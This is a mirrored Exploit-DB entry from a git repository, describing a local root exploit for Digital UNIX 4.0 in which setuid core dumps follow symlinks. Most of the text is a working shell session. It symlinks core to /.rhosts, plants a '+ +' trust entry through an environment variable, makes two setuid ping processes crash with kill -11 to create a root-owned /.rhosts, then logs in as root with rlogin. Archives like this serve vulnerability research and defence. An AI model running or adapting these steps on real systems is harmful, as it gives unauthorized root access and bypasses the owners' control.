bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/unix/local/19068.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
836 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/74/info
Digital UNIX 4.0 will follow symlinks while writting core files if two setuid programs dump core in sucession. The core file is owned by root but with the user's groud id. The core file permissions are 0600. This can be used to create root owned file anywhere in the filesystem.
$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1] Segmentation fault /usr/sbin/ping somehost (core dumped)
[2] +Segmentation fault /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw------- 1 root system 385024 Mar 29 05:17 /.rhosts
##/.rhosts has been created....that's all.##
$ rlogin localhost -l root
Reference in a new issue View git blame Copy permalink